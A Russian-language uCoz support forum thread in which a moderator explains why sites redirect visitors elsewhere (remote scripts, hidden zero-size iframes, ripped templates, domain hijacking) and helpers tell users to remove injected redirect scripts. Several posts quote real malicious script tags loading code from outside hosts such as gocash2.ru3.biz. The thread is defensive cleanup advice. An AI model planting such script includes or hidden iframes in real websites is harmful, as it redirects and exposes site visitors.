Модератор форума: Yuri_G  
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 256 | 22:38:37
Deus_EX, попробуйте сначала удалить из формы входа скрипт

Код
<script src="http://i1ii.ru/1.js" type="text/javascript"></script>


из из управления мини-профилем это нужно удалить

Код
<a href="http://musone.ucoz.ru /news/0-0-0-0-1">Добавить новость на сайт</a><br><br>  
<a href="http://musone.ucoz.ru /load/0-0-0-0-1">Добавить файл на сайт</a><br><br>  
это вообще с другого сайта

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Deus_EX
Сообщений: 39
Репутация: 1

Сообщение # 257 | 23:31:08
Вроде норм. Спасибо. Хотел бы спросить ответ на еще 1 вопрос который мучает меня 2 месяца. Почему при заходе на сайт minecraft1.ru ESET. БЛОКИРУЕТ ЕГО?????
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 258 | 23:38:29
Deus_EX, возможно он гневается на жестковатую рекламу на сайте. точнее можно сказать, если знать с какими предупреждениями он блокирует сайт. то есть нужно знать текст блокировки

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Litali
Сообщений: 2
Репутация: 0

Сообщение # 259 | 16:42:13
При заходе на сайт http://litali.my1.ru/ (не важно, с админа или гостя) переходит на левый сайт. Касперский блокирует указанную ссылку: http://gocash1.ru3.biz/js/back.php?id=54 Что делать, как спасти сайт? Заранее большое спасибо..
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 260 | 16:45:19
Litali, панель управления -дизайн - управление дизайном - быстрая замена. в поле что заменить вписываете скрип

Код
<script language="javascript" src="http://gocash1.ru3.biz/js/back.php?id=54"></script>


поле на что заменить оставляете пустым и производите замену во всех модулях. после меняете пароль от uid профиля

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Litali
Сообщений: 2
Репутация: 0

Сообщение # 261 | 16:55:29
webanet, Спасибо большое!
mihalna
Сообщений: 73
Репутация: 3

Сообщение # 262 | 16:53:20
Добрый день подскажите пожалуйста пользователи в последние дни жалуются, что при входе на Сайт или на форум или на др странички сайта вдруг перебрасывает и появляется табличка: "Ваша страница будет удалена за спам! Нажмите, чтобы сохранить ее!" Перебрасывает на сайт В Контакте. У меня лично такого нет и жалуются не все а несколько человек. Помогите и подскажите плиз, что это может быть?
Я нашла вот такую статью и дала прочитать Статья

Они сделали все как там описано и помогло, но на следующий день всё повторилось...но реестр и файл hosts чистые...Заранее спасибо!
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 263 | 17:04:54
mihalna, панель управления - дизайн - управление дизайном - быстрая замена. в поле что заменить впишите скрипт

Код
<script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=54"></script>


поле на что заменить оставьте пустым и произведите замену. смените пароль uid профиля

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
mihalna
Сообщений: 73
Репутация: 3

Сообщение # 264 | 17:38:20
webanet, дизайн - управление дизайном (шаблоны) - быстрая замена - что заменить:

ни как... выходит окошко:

и вопрос где менять пароль смените пароль uid профиля, тут или на сайте?
Сообщение отредактировал mihalna - Пятница, 01 Мар 2013, 17:52:00
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 265 | 17:55:23
mihalna, панель управления - дизайн - управление дизайном - в списке шаблонов ищем страницы сайта - там с помощью поиска ищем скирпт

Код
<script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=54"></script>


он находится в самом верху кода прямо перед тегом <title></title>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
mihalna
Сообщений: 73
Репутация: 3

Сообщение # 266 | 18:07:35
нашла...что с ним делать?
Сообщение отредактировал mihalna - Пятница, 01 Мар 2013, 18:10:32
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 267 | 18:12:51
mihalna, удалить и после удаления сохранить шаблон

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
mihalna
Сообщений: 73
Репутация: 3

Сообщение # 268 | 20:17:48
webanet, спс большое за помощь, удалила, буду ждать отзывы от пользователей. biggrin

Добавлено (01 Мар 2013, 20:17:48)
---------------------------------------------
webanet, к сожалению сейчас опять поступили жалоба вот пользователь скрин прислал

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 269 | 22:57:00
mihalna, тот же самый код остался в шаблоне материала и комментария в новостях

Код
<script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=54"></script>


в том же месте, что и был в шаблоне страницы сайта. проверьте все шаблоны

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Shizdec
Сообщений: 1
Репутация: 0

Сообщение # 270 | 23:36:32
удалено. сайт не находится в системе ucoz
Сообщение отредактировал webanet - Пятница, 01 Мар 2013, 23:42:25
Поиск: